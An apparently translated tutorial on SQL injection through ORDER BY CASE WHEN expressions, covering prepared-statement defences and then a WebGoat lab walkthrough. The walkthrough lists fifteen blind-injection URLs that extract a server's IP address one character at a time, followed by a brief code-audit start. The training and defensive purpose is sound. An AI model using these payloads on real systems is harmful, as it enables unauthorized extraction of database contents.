Article directory
Precompiled CASE injection
Precompiled CASE (Prepared CASE) is a control statement in a database query language (such as SQL). It can select and execute different statement blocks based on the value of a conditional expression, similar to a switch statement in a programming language. Precompiled CASE injection is a security vulnerability attack based on precompiled CASE statements.
The vulnerability principle of precompiled CASE injection attacks is similar to other types of injection attacks, that is, the attacker tries to construct specific input data to bypass the input validation and filtering mechanism of the application, thereby being able to perform unauthorized operations or obtain sensitive information, etc. .
In precompiled CASE injection attacks, attackers usually attack queries with conditional judgment statements that exist in the application. They bypass the input validation and filtering mechanisms by constructing malicious conditional expressions, allowing the results of the conditional expressions to reach the target of the attack. Purpose.
1. SQL injection vulnerability defense
-
To avoid using splicing to construct SQL statements, you can use pre-compilation and other technologies.
-
Perform adequate filtering on the parameters entering the SQL statement.
-
Deploy security devices such as WAF (web application security firewall).
-
Many current development frameworks have basically solved the SQL injection problem technically.
PreparedStatement in JAVA, PreparedStatement inherits from Statement.
The role of PreparedStatement: Precompile SQL statements and execute them: Prevent SQL injection problems.
PreparedStatement benefits:
- Pre-compiled SQL for higher performance.
- Prevent SQL injection: escape sensitive characters.
The Java code operation database process is as shown in the figure:
-
Send SQL statements to the MySQL server
-
The MySQL server will operate the SQL statement
-
Check the SQL statement and check whether the syntax of the SQL statement is correct
-
Compile SQL statements. Compile SQL statements into executable functions
Checking the SQL and compiling the SQL takes longer than executing the SQL.
If we just reset the parameters, checking the SQL statement and compiling the SQL statement will not need to be repeated. This improves performance.
-
Execute SQL statements.
-
As the saying goes, there is no absolute security, and pre-compiled technology cannot completely prevent SQL injection, it can only mitigate it.
For example, the parameter binding method can be bypassed in the following way: by using the case when statement, a select statement can be added to the orderExpression expression after order by.
The prerequisite is that there must be an order by field in the SQL statement before it can be injected through precompiled CASE.
2. WEBGOAT SQL injection
2.1 WebGoat 8.0
Download address: https://github.com/WebGoat/WebGoat/wiki
WebGoat official website and usage: https://github.com/WebGoat/WebGoat
Run WebGoat
implement:java -jar webgoat-server-8.0.0.M21.jar
Then, execute: in the browser http://127.0.0.1:8080/WebGoat
, open the WebGoat website, and you can use it after registering as a user.
2.2 Order by injection
Start the shooting range and access the specified page
The question requires obtaining the IP address of the server whose host name is webgoat-prd, and the question prompts that there is no SQL injection in Submit.
See WebGoat's tips to use the when condition when (true/false)
.
Use bp to capture data packets and click on the IP sorting place to capture the packets.
View packets
Sort by different columns
- Sort by IP:
- Sort by hostname:
Think of the value of the column parameter as the order by parameter in the SQL statement.
It is found here that the value of the column parameter is controllable, so we can pass a value at will and check the result returned by the browser.
Found an error message
Carefully observe the error message and find that there is an SQL statement in it
select id, hostname, ip, mac, status, description from servers where status <> 'out of order' order by wuhu
It is found that the value wuhu passed to column is ultimately the parameter of order by. And also gives a lot of database information. For example, there are id, hostname, ip, mac, status, description, the table name is servers, and the query is for information whose status is not 'out of order'. It can be inferred that the status of the server with the host name webgoat-prd is 'out of order', so normal query cannot find the server with the host name webgoat-prd.
Using case when for injection, the entire SQL statement is:
select id, hostname, ip, mac, status, description from servers where status <> 'out of order' order by case when (true/false) then hostname else id end
Note : If the condition in when is true, sort by hostname, otherwise sort by id.
Note :
- The column names after then and else must be legal, otherwise the SQL statement will return an error.
- There must be end at the end of the case statement.
2.2.1 Conditions for constructing when
Get the IP address of the server with hostname webgoat-prd
:
select ip from servers where hostname='webgoat-prd'
Determine whether the first bit is 1:
substring((select ip from servers where hostname='webgoat-prd'),1,1)=1
The SUBSTRING function is used to get a substring from a string.
Put the entire judgment condition into when, and the entire URL is:
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when (substring((select ip from servers where hostname='webgoat-prd'),1,1)=1) then hostname else id end)
Then URL-encode the constructed parameters and send the package. You can see that the results are sorted by hostname, indicating that the first digit of the IP address is 1.
The second bit is 0
The third place is 4
All SQL statements when the condition is true are:
Note : cannot be copied directly into bp, URL encoding is required.
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,1,1) from servers where hostname='webgoat-prd')=1) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,2,1) from servers where hostname='webgoat-prd')=0) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,3,1) from servers where hostname='webgoat-prd')=4) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,4,1) from servers where hostname='webgoat-prd')='.') then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,5,1) from servers where hostname='webgoat-prd')=1) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,6,1) from servers where hostname='webgoat-prd')=3) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,7,1) from servers where hostname='webgoat-prd')=0) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,8,1) from servers where hostname='webgoat-prd')='.') then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,9,1) from servers where hostname='webgoat-prd')=2) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,10,1) from servers where hostname='webgoat-prd')=1) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,11,1) from servers where hostname='webgoat-prd')=9) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,12,1) from servers where hostname='webgoat-prd')='.') then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,13,1) from servers where hostname='webgoat-prd')=2) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,14,1) from servers where hostname='webgoat-prd')=0) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,15,1) from servers where hostname='webgoat-prd')=2) then hostname else id end)
Finally, you can see that the IP address is 104.130.219.202
Finally, enter the obtained IP address into the page, that is, the customs clearance is successful.
2.2.2 Code audit
Locating Servers.java
the file and analyzing the source code, we can see that although the server uses precompilation, it still splices the order by parameter column, resulting in a SQL injection vulnerability: